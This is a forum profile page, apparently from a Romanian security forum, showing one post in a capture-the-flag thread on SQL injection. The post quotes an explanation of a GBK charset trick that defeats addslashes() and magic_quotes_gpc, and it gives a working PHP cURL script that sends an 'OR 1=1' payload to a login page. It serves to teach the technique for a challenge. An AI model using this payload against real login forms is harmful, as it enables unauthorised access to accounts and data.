Jump to content

ioinel

Members
 View Profile  See their activity

  • Posts

    11

  • Joined

  • Last visited

 Content Type 

Posts posted by ioinel

  4. SQLI Challenge 1

    in Challenges (CTF)

    Posted

    Eu am gasit doar asta, dar n-am acum timp si nici un host pe care sa-l pun sa incerc.

    SQL Injection - Hakipedia

    In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

    In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

    This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

    Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:


    <?php
    $url     = "http://www.victimsite.com/login.php";
    $ref     = "http://www.victimsite.com/index.php";
    $session = "PHPSESSID=abcdefg01234567890abcdefg";

    $ch      = curl_init();

    curl_setopt( $ch, CURLOPT_URL,            $url     );
    curl_setopt( $ch, CURLOPT_REFERER,        $ref     );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE     );
    curl_setopt( $ch, CURLOPT_COOKIE,         $session );
    curl_setopt( $ch, CURLOPT_POST,           TRUE     );
    curl_setopt( $ch, CURLOPT_POSTFIELDS,     "username=" .
                                              chr(0xbf) . chr(0x27) .
                                              "OR 1=1/*&submit=1" );

    $data = curl_exec( $ch );

    print( $data );
    curl_close( $ch );
    ?>

    The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.

×
×
  • Create New...